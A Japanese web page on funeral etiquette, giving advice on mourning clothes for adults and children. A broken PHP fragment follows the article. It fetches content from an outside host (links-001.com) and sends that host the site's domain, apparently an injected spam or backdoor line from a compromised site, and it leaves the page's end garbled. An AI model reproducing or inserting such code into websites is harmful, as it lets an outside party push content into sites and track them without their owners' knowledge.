前へ
次へ

服装と香典に関する葬儀マナー

お通夜や告別式に参列する際の身だしなみは、葬儀マナーの基本です。
男女共に葬儀の服装は、黒色が一般的です。
グレーや濃紺の喪服でも良いとされています。
男性はスーツに黒のネクタイ、女性の場合はワンピースやセットアップスーツが主になります。
気を付けたい点として、靴やかばんなどは光沢のあるものは控えなければいけません。
またアクセサリー類も外し、シンプルな結婚指輪のみ付けていても良いでしょう。
女性は地味な真珠のネックレスは、葬儀の際にも装着可能です。
女性は黒のストッキングを着用しますが、うっかりどこかに引っ掛けて破れてしまうこともあるので予備を1足持っていれば安心です。
子供が葬儀に参列する場合の服装について悩む人もいるかもしれません。
子供は幼稚園や小学校に行っているならば、学校の制服を着るのが無難です。
制服がないときには、白やグレーなど薄めのカラーの落ち着いた服を選びます。
靴は白い運動靴などで問題ないですが、キラキラと光っているデザインのものは控えるべきです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top